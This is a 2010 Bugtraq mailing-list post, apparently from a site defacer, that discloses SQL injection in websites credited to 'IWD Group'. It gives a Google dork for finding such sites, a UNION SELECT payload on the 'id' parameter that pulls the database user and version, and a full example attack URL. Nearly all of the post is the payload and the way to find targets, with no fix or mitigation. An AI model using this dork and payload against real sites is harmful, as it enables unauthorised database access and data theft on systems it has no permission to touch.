
Date: 22 Apr 2010 18:53:15 -0000
From: md.r00t.defacer@...il.com
To: bugtraq@...urityfocus.com
Subject: IWD Group SQL Injection Vulnerabilities

#------------------In The Name Of God------------
# IWD Group SQL Injection Vulnerabilities
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@...il.com
#Webstie: www.r00t.gigfa.com
#
###################################
#Google D0rk:
# "Designed by IWD Group"
###################################
#Exploit:
#---------
#
# 195 and 1=2 Union select 1,2,concat(user(),char(58,58,58),version()),4
###################################
#Example:
#
http://www.Site.com/index.php?page=headline&id=195 and 1=2 Union select1,2,concat(user(),char(58,58,58),version()),4
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
